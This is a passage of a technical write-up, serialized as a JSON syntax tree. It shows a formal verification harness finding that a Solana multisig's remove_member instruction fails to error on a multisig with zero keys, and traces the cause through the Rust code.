as:",{"type":25,"tag":206,"props":30529,"children":30531},{"code":30530,"language":6914,"meta":7,"className":6915,"style":7},"#[succeeds_if(\n    ctx.accounts.multisig.keys.len() > 1\n)]\n#[errors_if(\n    ctx.accounts.multisig.keys.len() \u003C= 1\n)]\nfn remove_member(...) { ... }\n",[30532],{"type":25,"tag":82,"props":30533,"children":30534},{"__ignoreMap":7},[30535,30542,30589,30596,30603,30650,30657],{"type":25,"tag":216,"props":30536,"children":30537},{"class":6922,"line":6923},[30538],{"type":25,"tag":216,"props":30539,"children":30540},{"style":6964},[30541],{"type":31,"value":28069},{"type":25,"tag":216,"props":30543,"children":30544},{"class":6922,"line":6769},[30545,30549,30553,30557,30561,30565,30569,30573,30577,30581,30585],{"type":25,"tag":216,"props":30546,"children":30547},{"style":6964},[30548],{"type":31,"value":24183},{"type":25,"tag":216,"props":30550,"children":30551},{"style":6953},[30552],{"type":31,"value":179},{"type":25,"tag":216,"props":30554,"children":30555},{"style":6964},[30556],{"type":31,"value":18632},{"type":25,"tag":216,"props":30558,"children":30559},{"style":6953},[30560],{"type":31,"value":179},{"type":25,"tag":216,"props":30562,"children":30563},{"style":6964},[30564],{"type":31,"value":27762},{"type":25,"tag":216,"props":30566,"children":30567},{"style":6953},[30568],{"type":31,"value":179},{"type":25,"tag":216,"props":30570,"children":30571},{"style":6964},[30572],{"type":31,"value":24943},{"type":25,"tag":216,"props":30574,"children":30575},{"style":6953},[30576],{"type":31,"value":179},{"type":25,"tag":216,"props":30578,"children":30579},{"style":6964},[30580],{"type":31,"value":24981},{"type":25,"tag":216,"props":30582,"children":30583},{"style":6953},[30584],{"type":31,"value":5902},{"type":25,"tag":216,"props":30586,"children":30587},{"style":6964},[30588],{"type":31,"value":23402},{"type":25,"tag":216,"props":30590,"children":30591},{"class":6922,"line":6778},[30592],{"type":25,"tag":216,"props":30593,"children":30594},{"style":6964},[30595],{"type":31,"value":24218},{"type":25,"tag":216,"props":30597,"children":30598},{"class":6922,"line":7005},[30599],{"type":25,"tag":216,"props":30600,"children":30601},{"style":6964},[30602],{"type":31,"value":24175},{"type":25,"tag":216,"props":30604,"children":30605},{"class":6922,"line":7110},[30606,30610,30614,30618,30622,30626,30630,30634,30638,30642,30646],{"type":25,"tag":216,"props":30607,"children":30608},{"style":6964},[30609],{"type":31,"value":24183},{"type":25,"tag":216,"props":30611,"children":30612},{"style":6953},[30613],{"type":31,"value":179},{"type":25,"tag":216,"props":30615,"children":30616},{"style":6964},[30617],{"type":31,"value":18632},{"type":25,"tag":216,"props":30619,"children":30620},{"style":6953},[30621],{"type":31,"value":179},{"type":25,"tag":216,"props":30623,"children":30624},{"style":6964},[30625],{"type":31,"value":27762},{"type":25,"tag":216,"props":30627,"children":30628},{"style":6953},[30629],{"type":31,"value":179},{"type":25,"tag":216,"props":30631,"children":30632},{"style":6964},[30633],{"type":31,"value":24943},{"type":25,"tag":216,"props":30635,"children":30636},{"style":6953},[30637],{"type":31,"value":179},{"type":25,"tag":216,"props":30639,"children":30640},{"style":6964},[30641],{"type":31,"value":24981},{"type":25,"tag":216,"props":30643,"children":30644},{"style":6953},[30645],{"type":31,"value":23374},{"type":25,"tag":216,"props":30647,"children":30648},{"style":6964},[30649],{"type":31,"value":23402},{"type":25,"tag":216,"props":30651,"children":30652},{"class":6922,"line":7216},[30653],{"type":25,"tag":216,"props":30654,"children":30655},{"style":6964},[30656],{"type":31,"value":24218},{"type":25,"tag":216,"props":30658,"children":30659},{"class":6922,"line":7244},[30660,30664,30668,30672,30676,30680,30684],{"type":25,"tag":216,"props":30661,"children":30662},{"style":6936},[30663],{"type":31,"value":24226},{"type":25,"tag":216,"props":30665,"children":30666},{"style":7047},[30667],{"type":31,"value":29723},{"type":25,"tag":216,"props":30669,"children":30670},{"style":6964},[30671],{"type":31,"value":1850},{"type":25,"tag":216,"props":30673,"children":30674},{"style":6953},[30675],{"type":31,"value":13547},{"type":25,"tag":216,"props":30677,"children":30678},{"style":6964},[30679],{"type":31,"value":27946},{"type":25,"tag":216,"props":30681,"children":30682},{"style":6953},[30683],{"type":31,"value":13547},{"type":25,"tag":216,"props":30685,"children":30686},{"style":6964},[30687],{"type":31,"value":13552},{"type":25,"tag":38,"props":30689,"children":30690},{},[30691,30693,30698],{"type":31,"value":30692},"Let's test this, we just need to run the new ",{"type":25,"tag":82,"props":30694,"children":30696},{"className":30695},[],[30697],{"type":31,"value":24122},{"type":31,"value":30699}," harness:",{"type":25,"tag":206,"props":30701,"children":30703},{"code":30702},"VERIFICATION:- FAILED\nVerification Time: 31.900913s\n",[30704],{"type":25,"tag":82,"props":30705,"children":30706},{"__ignoreMap":7},[30707],{"type":31,"value":30702},{"type":25,"tag":38,"props":30709,"children":30710},{},[30711],{"type":31,"value":30712},"Hmm, this verification failed! Let's look at the counterexample. The multisig it is trying to remove a member from looks like:",{"type":25,"tag":206,"props":30714,"children":30716},{"code":30715,"language":6914,"meta":7,"className":6915,"style":7},"Account {\n    account: Ms {\n        threshold: 0,\n        authority_index: 0,\n        transaction_index: 0,\n        ms_change_index: 0,\n        bump: 0,\n        create_key: ...,\n        allow_external_execute: false,\n        keys: Vec {\n            data: ...,\n            size: 0,\n        },\n    },\n    info: AccountInfo { ... },\n}\n",[30717],{"type":25,"tag":82,"props":30718,"children":30719},{"__ignoreMap":7},[30720,30731,30750,30769,30788,30807,30826,30845,30864,30883,30902,30922,30941,30948,30955,30982],{"type":25,"tag":216,"props":30721,"children":30722},{"class":6922,"line":6923},[30723,30727],{"type":25,"tag":216,"props":30724,"children":30725},{"style":7375},[30726],{"type":31,"value":21104},{"type":25,"tag":216,"props":30728,"children":30729},{"style":6964},[30730],{"type":31,"value":7241},{"type":25,"tag":216,"props":30732,"children":30733},{"class":6922,"line":6769},[30734,30738,30742,30746],{"type":25,"tag":216,"props":30735,"children":30736},{"style":6947},[30737],{"type":31,"value":29129},{"type":25,"tag":216,"props":30739,"children":30740},{"style":6953},[30741],{"type":31,"value":1472},{"type":25,"tag":216,"props":30743,"children":30744},{"style":7375},[30745],{"type":31,"value":25116},{"type":25,"tag":216,"props":30747,"children":30748},{"style":6964},[30749],{"type":31,"value":7241},{"type":25,"tag":216,"props":30751,"children":30752},{"class":6922,"line":6778},[30753,30757,30761,30765],{"type":25,"tag":216,"props":30754,"children":30755},{"style":6947},[30756],{"type":31,"value":27783},{"type":25,"tag":216,"props":30758,"children":30759},{"style":6953},[30760],{"type":31,"value":1472},{"type":25,"tag":216,"props":30762,"children":30763},{"style":6989},[30764],{"type":31,"value":6992},{"type":25,"tag":216,"props":30766,"children":30767},{"style":6964},[30768],{"type":31,"value":7465},{"type":25,"tag":216,"props":30770,"children":30771},{"class":6922,"line":7005},[30772,30776,30780,30784],{"type":25,"tag":216,"props":30773,"children":30774},{"style":6947},[30775],{"type":31,"value":29169},{"type":25,"tag":216,"props":30777,"children":30778},{"style":6953},[30779],{"type":31,"value":1472},{"type":25,"tag":216,"props":30781,"children":30782},{"style":6989},[30783],{"type":31,"value":6992},{"type":25,"tag":216,"props":30785,"children":30786},{"style":6964},[30787],{"type":31,"value":7465},{"type":25,"tag":216,"props":30789,"children":30790},{"class":6922,"line":7110},[30791,30795,30799,30803],{"type":25,"tag":216,"props":30792,"children":30793},{"style":6947},[30794],{"type":31,"value":29189},{"type":25,"tag":216,"props":30796,"children":30797},{"style":6953},[30798],{"type":31,"value":1472},{"type":25,"tag":216,"props":30800,"children":30801},{"style":6989},[30802],{"type":31,"value":6992},{"type":25,"tag":216,"props":30804,"children":30805},{"style":6964},[30806],{"type":31,"value":7465},{"type":25,"tag":216,"props":30808,"children":30809},{"class":6922,"line":7216},[30810,30814,30818,30822],{"type":25,"tag":216,"props":30811,"children":30812},{"style":6947},[30813],{"type":31,"value":29209},{"type":25,"tag":216,"props":30815,"children":30816},{"style":6953},[30817],{"type":31,"value":1472},{"type":25,"tag":216,"props":30819,"children":30820},{"style":6989},[30821],{"type":31,"value":6992},{"type":25,"tag":216,"props":30823,"children":30824},{"style":6964},[30825],{"type":31,"value":7465},{"type":25,"tag":216,"props":30827,"children":30828},{"class":6922,"line":7244},[30829,30833,30837,30841],{"type":25,"tag":216,"props":30830,"children":30831},{"style":6947},[30832],{"type":31,"value":29229},{"type":25,"tag":216,"props":30834,"children":30835},{"style":6953},[30836],{"type":31,"value":1472},{"type":25,"tag":216,"props":30838,"children":30839},{"style":6989},[30840],{"type":31,"value":6992},{"type":25,"tag":216,"props":30842,"children":30843},{"style":6964},[30844],{"type":31,"value":7465},{"type":25,"tag":216,"props":30846,"children":30847},{"class":6922,"line":7257},[30848,30852,30856,30860],{"type":25,"tag":216,"props":30849,"children":30850},{"style":6947},[30851],{"type":31,"value":27796},{"type":25,"tag":216,"props":30853,"children":30854},{"style":6953},[30855],{"type":31,"value":1472},{"type":25,"tag":216,"props":30857,"children":30858},{"style":6953},[30859],{"type":31,"value":29257},{"type":25,"tag":216,"props":30861,"children":30862},{"style":6964},[30863],{"type":31,"value":7465},{"type":25,"tag":216,"props":30865,"children":30866},{"class":6922,"line":7275},[30867,30871,30875,30879],{"type":25,"tag":216,"props":30868,"children":30869},{"style":6947},[30870],{"type":31,"value":29269},{"type":25,"tag":216,"props":30872,"children":30873},{"style":6953},[30874],{"type":31,"value":1472},{"type":25,"tag":216,"props":30876,"children":30877},{"style":6936},[30878],{"type":31,"value":13012},{"type":25,"tag":216,"props":30880,"children":30881},{"style":6964},[30882],{"type":31,"value":7465},{"type":25,"tag":216,"props":30884,"children":30885},{"class":6922,"line":7296},[30886,30890,30894,30898],{"type":25,"tag":216,"props":30887,"children":30888},{"style":6947},[30889],{"type":31,"value":29289},{"type":25,"tag":216,"props":30891,"children":30892},{"style":6953},[30893],{"type":31,"value":1472},{"type":25,"tag":216,"props":30895,"children":30896},{"style":7375},[30897],{"type":31,"value":25349},{"type":25,"tag":216,"props":30899,"children":30900},{"style":6964},[30901],{"type":31,"value":7241},{"type":25,"tag":216,"props":30903,"children":30904},{"class":6922,"line":7305},[30905,30910,30914,30918],{"type":25,"tag":216,"props":30906,"children":30907},{"style":6947},[30908],{"type":31,"value":30909},"            data",{"type":25,"tag":216,"props":30911,"children":30912},{"style":6953},[30913],{"type":31,"value":1472},{"type":25,"tag":216,"props":30915,"children":30916},{"style":6953},[30917],{"type":31,"value":29257},{"type":25,"tag":216,"props":30919,"children":30920},{"style":6964},[30921],{"type":31,"value":7465},{"type":25,"tag":216,"props":30923,"children":30924},{"class":6922,"line":7557},[30925,30929,30933,30937],{"type":25,"tag":216,"props":30926,"children":30927},{"style":6947},[30928],{"type":31,"value":29310},{"type":25,"tag":216,"props":30930,"children":30931},{"style":6953},[30932],{"type":31,"value":1472},{"type":25,"tag":216,"props":30934,"children":30935},{"style":6989},[30936],{"type":31,"value":6992},{"type":25,"tag":216,"props":30938,"children":30939},{"style":6964},[30940],{"type":31,"value":7465},{"type":25,"tag":216,"props":30942,"children":30943},{"class":6922,"line":7574},[30944],{"type":25,"tag":216,"props":30945,"children":30946},{"style":6964},[30947],{"type":31,"value":29331},{"type":25,"tag":216,"props":30949,"children":30950},{"class":6922,"line":7591},[30951],{"type":25,"tag":216,"props":30952,"children":30953},{"style":6964},[30954],{"type":31,"value":29339},{"type":25,"tag":216,"props":30956,"children":30957},{"class":6922,"line":7604},[30958,30962,30966,30970,30974,30978],{"type":25,"tag":216,"props":30959,"children":30960},{"style":6947},[30961],{"type":31,"value":29347},{"type":25,"tag":216,"props":30963,"children":30964},{"style":6953},[30965],{"type":31,"value":1472},{"type":25,"tag":216,"props":30967,"children":30968},{"style":7375},[30969],{"type":31,"value":29356},{"type":25,"tag":216,"props":30971,"children":30972},{"style":6964},[30973],{"type":31,"value":13542},{"type":25,"tag":216,"props":30975,"children":30976},{"style":6953},[30977],{"type":31,"value":13547},{"type":25,"tag":216,"props":30979,"children":30980},{"style":6964},[30981],{"type":31,"value":29369},{"type":25,"tag":216,"props":30983,"children":30984},{"class":6922,"line":7613},[30985],{"type":25,"tag":216,"props":30986,"children":30987},{"style":6964},[30988],{"type":31,"value":7874},{"type":25,"tag":38,"props":30990,"children":30991},{},[30992],{"type":31,"value":30993},"Interestingly, the multisig has 0 keys and yet this instruction does not error. Let's take a closer look to figure out why:",{"type":25,"tag":38,"props":30995,"children":30996},{},[30997,30999,31005],{"type":31,"value":30998},"Inside our handler, we see that it only checks if the number of keys exactly equals 1. Otherwise it invokes ",{"type":25,"tag":82,"props":31000,"children":31002},{"className":31001},[],[31003],{"type":31,"value":31004},"Ms::remove_member",{"type":31,"value":1472},{"type":25,"tag":206,"props":31007,"children":31009},{"code":31008,"language":6914,"meta":7,"className":6915,"style":7},"if ctx.accounts.multisig.keys.len() == 1 {\n    return err!(MsError::CannotRemoveSoloMember);\n}\nctx.accounts.multisig.remove_member(old_member)?;\n",[31010],{"type":25,"tag":82,"props":31011,"children":31012},{"__ignoreMap":7},[31013,31072,31103,31110],{"type":25,"tag":216,"props":31014,"children":31015},{"class":6922,"line":6923},[31016,31020,31024,31028,31032,31036,31040,31044,31048,31052,31056,31060,31064,31068],{"type":25,"tag":216,"props":31017,"children":31018},{"style":6973},[31019],{"type":31,"value":19537},{"type":25,"tag":216,"props":31021,"children":31022},{"style":6947},[31023],{"type":31,"value":29801},{"type":25,"tag":216,"props":31025,"children":31026},{"style":6953},[31027],{"type":31,"value":179},{"type":25,"tag":216,"props":31029,"children":31030},{"style":6964},[31031],{"type":31,"value":18632},{"type":25,"tag":216,"props":31033,"children":31034},{"style":6953},[31035],{"type":31,"value":179},{"type":25,"tag":216,"props":31037,"children":31038},{"style":6964},[31039],{"type":31,"value":27762},{"type":25,"tag":216,"props":31041,"children":31042},{"style":6953},[31043],{"type":31,"value":179},{"type":25,"tag":216,"props":31045,"children":31046},{"style":6964},[31047],{"type":31,"value":24943},{"type":25,"tag":216,"props":31049,"children":31050},{"style":6953},[31051],{"type":31,"value":179},{"type":25,"tag":216,"props":31053,"children":31054},{"style":7047},[31055],{"type":31,"value":13094},{"type":25,"tag":216,"props":31057,"children":31058},{"style":6964},[31059],{"type":31,"value":18000},{"type":25,"tag":216,"props":31061,"children":31062},{"style":6953},[31063],{"type":31,"value":12528},{"type":25,"tag":216,"props":31065,"children":31066},{"style":6989},[31067],{"type":31,"value":8471},{"type":25,"tag":216,"props":31069,"children":31070},{"style":6964},[31071],{"type":31,"value":7241},{"type":25,"tag":216,"props":31073,"children":31074},{"class":6922,"line":6769},[31075,31079,31083,31087,31091,31095,31099],{"type":25,"tag":216,"props":31076,"children":31077},{"style":6973},[31078],{"type":31,"value":20947},{"type":25,"tag":216,"props":31080,"children":31081},{"style":7047},[31082],{"type":31,"value":27465},{"type":25,"tag":216,"props":31084,"children":31085},{"style":6964},[31086],{"type":31,"value":1850},{"type":25,"tag":216,"props":31088,"children":31089},{"style":7375},[31090],{"type":31,"value":27474},{"type":25,"tag":216,"props":31092,"children":31093},{"style":6953},[31094],{"type":31,"value":7438},{"type":25,"tag":216,"props":31096,"children":31097},{"style":7375},[31098],{"type":31,"value":29877},{"type":25,"tag":216,"props":31100,"children":31101},{"style":6964},[31102],{"type":31,"value":7797},{"type":25,"tag":216,"props":31104,"children":31105},{"class":6922,"line":6778},[31106],{"type":25,"tag":216,"props":31107,"children":31108},{"style":6964},[31109],{"type":31,"value":7874},{"type":25,"tag":216,"props":31111,"children":31112},{"class":6922,"line":7005},[31113,31117,31121,31125,31129,31133,31137,31141,31145,31149,31153,31157],{"type":25,"tag":216,"props":31114,"children":31115},{"style":6947},[31116],{"type":31,"value":24240},{"type":25,"tag":216,"props":31118,"children":31119},{"style":6953},[31120],{"type":31,"value":179},{"type":25,"tag":216,"props":31122,"children":31123},{"style":6964},[31124],{"type":31,"value":18632},{"type":25,"tag":216,"props":31126,"children":31127},{"style":6953},[31128],{"type":31,"value":179},{"type":25,"tag":216,"props":31130,"children":31131},{"style":6964},[31132],{"type":31,"value":27762},{"type":25,"tag":216,"props":31134,"children":31135},{"style":6953},[31136],{"type":31,"value":179},{"type":25,"tag":216,"props":31138,"children":31139},{"style":7047},[31140],{"type":31,"value":29424},{"type":25,"tag":216,"props":31142,"children":31143},{"style":6964},[31144],{"type":31,"value":1850},{"type":25,"tag":216,"props":31146,"children":31147},{"style":6947},[31148],{"type":31,"value":29757},{"type":25,"tag":216,"props":31150,"children":31151},{"style":6964},[31152],{"type":31,"value":1888},{"type":25,"tag":216,"props":31154,"children":31155},{"style":6953},[31156],{"type":31,"value":604},{"type":25,"tag":216,"props":31158,"children":31159},{"style":6964},[31160],{"type":31,"value":6967},{"type":25,"tag":38,"props":31162,"children":31163},{},[31164,31166,31172,31174,31180],{"type":31,"value":31165},"In that function, it checks if the member to remove is contained in that multisig (with ",{"type":25,"tag":82,"props":31167,"children":31169},{"className":31168},[],[31170],{"type":31,"value":31171},"Ms::is_member",{"type":31,"value":31173},") and if it is not, it simply skips the removal and returns ",{"type":25,"tag":82,"props":31175,"children":31177},{"className":31176},[],[31178],{"type":31,"value":31179},"Ok(())",{"type":31,"value":179},{"type":25,"tag":206,"props":31182,"children":31184},{"code":31183,"language":6914,"meta":7,"className":6915,"style":7},"pub fn remove_member(&mut self, member: Pubkey) -> Result\u003C()> {\n    if let Some(ind) = self.is_member(member) {\n        self.keys.remove(ind);\n        if self.keys.len() \u003C usize::from(self.threshold) {\n            self.threshold = self.keys.len().try_into().unwrap();\n        }\n    }\n    Ok(())\n}\n",[31185],{"type":25,"tag":82,"props":31186,"children":31187},{"__ignoreMap":7},[31188,31252,31311,31348,31407,31475,31482,31489,31500],{"type":25,"tag":216,"props":31189,"children":31190},{"class":6922,"line":6923},[31191,31195,31199,31203,31207,31211,31215,31219,31223,31228,31232,31236,31240,31244,31248],{"type":25,"tag":216,"props":31192,"children":31193},{"style":6936},[31194],{"type":31,"value":17647},{"type":25,"tag":216,"props":31196,"children":31197},{"style":6936},[31198],{"type":31,"value":17652},{"type":25,"tag":216,"props":31200,"children":31201},{"style":7047},[31202],{"type":31,"value":29723},{"type":25,"tag":216,"props":31204,"children":31205},{"style":6964},[31206],{"type":31,"value":1850},{"type":25,"tag":216,"props":31208,"children":31209},{"style":6953},[31210],{"type":31,"value":7059},{"type":25,"tag":216,"props":31212,"children":31213},{"style":6936},[31214],{"type":31,"value":7691},{"type":25,"tag":216,"props":31216,"children":31217},{"style":6936},[31218],{"type":31,"value":17754},{"type":25,"tag":216,"props":31220,"children":31221},{"style":6964},[31222],{"type":31,"value":7026},{"type":25,"tag":216,"props":31224,"children":31225},{"style":6947},[31226],{"type":31,"value":31227},"member",{"type":25,"tag":216,"props":31229,"children":31230},{"style":6953},[31231],{"type":31,"value":1472},{"type":25,"tag":216,"props":31233,"children":31234},{"style":7375},[31235],{"type":31,"value":24817},{"type":25,"tag":216,"props":31237,"children":31238},{"style":6964},[31239],{"type":31,"value":7036},{"type":25,"tag":216,"props":31241,"children":31242},{"style":6953},[31243],{"type":31,"value":17714},{"type":25,"tag":216,"props":31245,"children":31246},{"style":7375},[31247],{"type":31,"value":17719},{"type":25,"tag":216,"props":31249,"children":31250},{"style":6964},[31251],{"type":31,"value":24291},{"type":25,"tag":216,"props":31253,"children":31254},{"class":6922,"line":6769},[31255,31259,31264,31269,31273,31278,31282,31286,31290,31294,31299,31303,31307],{"type":25,"tag":216,"props":31256,"children":31257},{"style":6973},[31258],{"type":31,"value":16235},{"type":25,"tag":216,"props":31260,"children":31261},{"style":6936},[31262],{"type":31,"value":31263}," let",{"type":25,"tag":216,"props":31265,"children":31266},{"style":7375},[31267],{"type":31,"value":31268}," Some",{"type":25,"tag":216,"props":31270,"children":31271},{"style":6964},[31272],{"type":31,"value":1850},{"type":25,"tag":216,"props":31274,"children":31275},{"style":6947},[31276],{"type":31,"value":31277},"ind",{"type":25,"tag":216,"props":31279,"children":31280},{"style":6964},[31281],{"type":31,"value":7036},{"type":25,"tag":216,"props":31283,"children":31284},{"style":6953},[31285],{"type":31,"value":266},{"type":25,"tag":216,"props":31287,"children":31288},{"style":6936},[31289],{"type":31,"value":17754},{"type":25,"tag":216,"props":31291,"children":31292},{"style":6953},[31293],{"type":31,"value":179},{"type":25,"tag":216,"props":31295,"children":31296},{"style":7047},[31297],{"type":31,"value":31298},"is_member",{"type":25,"tag":216,"props":31300,"children":31301},{"style":6964},[31302],{"type":31,"value":1850},{"type":25,"tag":216,"props":31304,"children":31305},{"style":6947},[31306],{"type":31,"value":31227},{"type":25,"tag":216,"props":31308,"children":31309},{"style":6964},[31310],{"type":31,"value":18761},{"type":25,"tag":216,"props":31312,"children":31313},{"class":6922,"line":6778},[31314,31319,31323,31327,31331,31336,31340,31344],{"type":25,"tag":216,"props":31315,"children":31316},{"style":6936},[31317],{"type":31,"value":31318},"        self",{"type":25,"tag":216,"props":31320,"children":31321},{"style":6953},[31322],{"type":31,"value":179},{"type":25,"tag":216,"props":31324,"children":31325},{"style":6964},[31326],{"type":31,"value":24943},{"type":25,"tag":216,"props":31328,"children":31329},{"style":6953},[31330],{"type":31,"value":179},{"type":25,"tag":216,"props":31332,"children":31333},{"style":7047},[31334],{"type":31,"value":31335},"remove",{"type":25,"tag":216,"props":31337,"children":31338},{"style":6964},[31339],{"type":31,"value":1850},{"type":25,"tag":216,"props":31341,"children":31342},{"style":6947},[31343],{"type":31,"value":31277},{"type":25,"tag":216,"props":31345,"children":31346},{"style":6964},[31347],{"type":31,"value":7797},{"type":25,"tag":216,"props":31349,"children":31350},{"class":6922,"line":7005},[31351,31355,31359,31363,31367,31371,31375,31379,31383,31387,31391,31395,31399,31403],{"type":25,"tag":216,"props":31352,"children":31353},{"style":6973},[31354],{"type":31,"value":7222},{"type":25,"tag":216,"props":31356,"children":31357},{"style":6936},[31358],{"type":31,"value":17754},{"type":25,"tag":216,"props":31360,"children":31361},{"style":6953},[31362],{"type":31,"value":179},{"type":25,"tag":216,"props":31364,"children":31365},{"style":6964},[31366],{"type":31,"value":24943},{"type":25,"tag":216,"props":31368,"children":31369},{"style":6953},[31370],{"type":31,"value":179},{"type":25,"tag":216,"props":31372,"children":31373},{"style":7047},[31374],{"type":31,"value":13094},{"type":25,"tag":216,"props":31376,"children":31377},{"style":6964},[31378],{"type":31,"value":30002},{"type":25,"tag":216,"props":31380,"children":31381},{"style":7375},[31382],{"type":31,"value":20560},{"type":25,"tag":216,"props":31384,"children":31385},{"style":6953},[31386],{"type":31,"value":7438},{"type":25,"tag":216,"props":31388,"children":31389},{"style":7047},[31390],{"type":31,"value":23433},{"type":25,"tag":216,"props":31392,"children":31393},{"style":6964},[31394],{"type":31,"value":1850},{"type":25,"tag":216,"props":31396,"children":31397},{"style":6936},[31398],{"type":31,"value":17670},{"type":25,"tag":216,"props":31400,"children":31401},{"style":6953},[31402],{"type":31,"value":179},{"type":25,"tag":216,"props":31404,"children":31405},{"style":6964},[31406],{"type":31,"value":30047},{"type":25,"tag":216,"props":31408,"children":31409},{"class":6922,"line":7110},[31410,31415,31419,31423,31427,31431,31435,31439,31443,31447,31451,31455,31459,31463,31467,31471],{"type":25,"tag":216,"props":31411,"children":31412},{"style":6936},[31413],{"type":31,"value":31414},"            self",{"type":25,"tag":216,"props":31416,"children":31417},{"style":6953},[31418],{"type":31,"value":179},{"type":25,"tag":216,"props":31420,"children":31421},{"style":6964},[31422],{"type":31,"value":25031},{"type":25,"tag":216,"props":31424,"children":31425},{"style":6953},[31426],{"type":31,"value":266},{"type":25,"tag":216,"props":31428,"children":31429},{"style":6936},[31430],{"type":31,"value":17754},{"type":25,"tag":216,"props":31432,"children":31433},{"style":6953},[31434],{"type":31,"value":179},{"type":25,"tag":216,"props":31436,"children":31437},{"style":6964},[31438],{"type":31,"value":24943},{"type":25,"tag":216,"props":31440,"children":31441},{"style":6953},[31442],{"type":31,"value":179},{"type":25,"tag":216,"props":31444,"children":31445},{"style":7047},[31446],{"type":31,"value":13094},{"type":25,"tag":216,"props":31448,"children":31449},{"style":6964},[31450],{"type":31,"value":17836},{"type":25,"tag":216,"props":31452,"children":31453},{"style":6953},[31454],{"type":31,"value":179},{"type":25,"tag":216,"props":31456,"children":31457},{"style":7047},[31458],{"type":31,"value":30120},{"type":25,"tag":216,"props":31460,"children":31461},{"style":6964},[31462],{"type":31,"value":17836},{"type":25,"tag":216,"props":31464,"children":31465},{"style":6953},[31466],{"type":31,"value":179},{"type":25,"tag":216,"props":31468,"children":31469},{"style":7047},[31470],{"type":31,"value":7628},{"type":25,"tag":216,"props":31472,"children":31473},{"style":6964},[31474],{"type":31,"value":7633},{"type":25,"tag":216,"props":31476,"children":31477},{"class":6922,"line":7216},[31478],{"type":25,"tag":216,"props":31479,"children":31480},{"style":6964},[31481],{"type":31,"value":7302},{"type":25,"tag":216,"props":31483,"children":31484},{"class":6922,"line":7244},[31485],{"type":25,"tag":216,"props":31486,"children":31487},{"style":6964},[31488],{"type":31,"value":7311},{"type":25,"tag":216,"props":31490,"children":31491},{"class":6922,"line":7257},[31492,31496],{"type":25,"tag":216,"props":31493,"children":31494},{"style":7375},[31495],{"type":31,"value":18290},{"type":25,"tag":216,"props":31497,"children":31498},{"style":6964},[31499],{"type":31,"value":18295},{"type":25,"tag":216,"props":31501,"children":31502},{"class":6922,"line":7275},[31503],{"type":25,"tag":216,"props":31504,"children":31505},{"style":6964},[31506],{"type":31,"value":7874},{"type":25,"tag":38,"props":31508,"children":31509},{},[31510,31512,31517,31519,31525,31527,31533,31535,31540],{"type":31,"value":31511},"Inside ",{"type":25,"tag":82,"props":31513,"children":31515},{"className":31514},[],[31516],{"type":31,"value":31171},{"type":31,"value":31518},", we see that it performs a ",{"type":25,"tag":82,"props":31520,"children":31522},{"className":31521},[],[31523],{"type":31,"value":31524},"binary_search",{"type":31,"value":31526}," on the keys vec and returns the index or ",{"type":25,"tag":82,"props":31528,"children":31530},{"className":31529},[],[31531],{"type":31,"value":31532},"None",{"type":31,"value":31534},". Since the vec has size zero, this will just return ",{"type":25,"tag":82,"props":31536,"children":31538},{"className":31537},[],[31539],{"type":31,"value":31532},{"type":31,"value":179},{"type":25,"tag":206,"props":31542,"children":31544},{"code":31543,"language":6914,"meta":7,"className":6915,"style":7},"pub fn is_member(&self, member: Pubkey) -> Option\u003Cusize> {\n    match self.keys.binary_search(&member) {\n        Ok(ind) => Some(ind),\n        _ => None,\n    }\n}\n",[31545],{"type":25,"tag":82,"props":31546,"children":31547},{"__ignoreMap":7},[31548,31617,31660,31699,31721,31728],{"type":25,"tag":216,"props":31549,"children":31550},{"class":6922,"line":6923},[31551,31555,31559,31564,31568,31572,31576,31580,31584,31588,31592,31596,31600,31605,31609,31613],{"type":25,"tag":216,"props":31552,"children":31553},{"style":6936},[31554],{"type":31,"value":17647},{"type":25,"tag":216,"props":31556,"children":31557},{"style":6936},[31558],{"type":31,"value":17652},{"type":25,"tag":216,"props":31560,"children":31561},{"style":7047},[31562],{"type":31,"value":31563}," is_member",{"type":25,"tag":216,"props":31565,"children":31566},{"style":6964},[31567],{"type":31,"value":1850},{"type":25,"tag":216,"props":31569,"children":31570},{"style":6953},[31571],{"type":31,"value":7059},{"type":25,"tag":216,"props":31573,"children":31574},{"style":6936},[31575],{"type":31,"value":17670},{"type":25,"tag":216,"props":31577,"children":31578},{"style":6964},[31579],{"type":31,"value":7026},{"type":25,"tag":216,"props":31581,"children":31582},{"style":6947},[31583],{"type":31,"value":31227},{"type":25,"tag":216,"props":31585,"children":31586},{"style":6953},[31587],{"type":31,"value":1472},{"type":25,"tag":216,"props":31589,"children":31590},{"style":7375},[31591],{"type":31,"value":24817},{"type":25,"tag":216,"props":31593,"children":31594},{"style":6964},[31595],{"type":31,"value":7036},{"type":25,"tag":216,"props":31597,"children":31598},{"style":6953},[31599],{"type":31,"value":17714},{"type":25,"tag":216,"props":31601,"children":31602},{"style":7375},[31603],{"type":31,"value":31604}," Option",{"type":25,"tag":216,"props":31606,"children":31607},{"style":6964},[31608],{"type":31,"value":9757},{"type":25,"tag":216,"props":31610,"children":31611},{"style":7375},[31612],{"type":31,"value":20560},{"type":25,"tag":216,"props":31614,"children":31615},{"style":6964},[31616],{"type":31,"value":11233},{"type":25,"tag":216,"props":31618,"children":31619},{"class":6922,"line":6769},[31620,31624,31628,31632,31636,31640,31644,31648,31652,31656],{"type":25,"tag":216,"props":31621,"children":31622},{"style":6973},[31623],{"type":31,"value":18710},{"type":25,"tag":216,"props":31625,"children":31626},{"style":6936},[31627],{"type":31,"value":17754},{"type":25,"tag":216,"props":31629,"children":31630},{"style":6953},[31631],{"type":31,"value":179},{"type":25,"tag":216,"props":31633,"children":31634},{"style":6964},[31635],{"type":31,"value":24943},{"type":25,"tag":216,"props":31637,"children":31638},{"style":6953},[31639],{"type":31,"value":179},{"type":25,"tag":216,"props":31641,"children":31642},{"style":7047},[31643],{"type":31,"value":31524},{"type":25,"tag":216,"props":31645,"children":31646},{"style":6964},[31647],{"type":31,"value":1850},{"type":25,"tag":216,"props":31649,"children":31650},{"style":6953},[31651],{"type":31,"value":7059},{"type":25,"tag":216,"props":31653,"children":31654},{"style":6947},[31655],{"type":31,"value":31227},{"type":25,"tag":216,"props":31657,"children":31658},{"style":6964},[31659],{"type":31,"value":18761},{"type":25,"tag":216,"props":31661,"children":31662},{"class":6922,"line":6778},[31663,31667,31671,31675,31679,31683,31687,31691,31695],{"type":25,"tag":216,"props":31664,"children":31665},{"style":7375},[31666],{"type":31,"value":18769},{"type":25,"tag":216,"props":31668,"children":31669},{"style":6964},[31670],{"type":31,"value":1850},{"type":25,"tag":216,"props":31672,"children":31673},{"style":6947},[31674],{"type":31,"value":31277},{"type":25,"tag":216,"props":31676,"children":31677},{"style":6964},[31678],{"type":31,"value":7036},{"type":25,"ta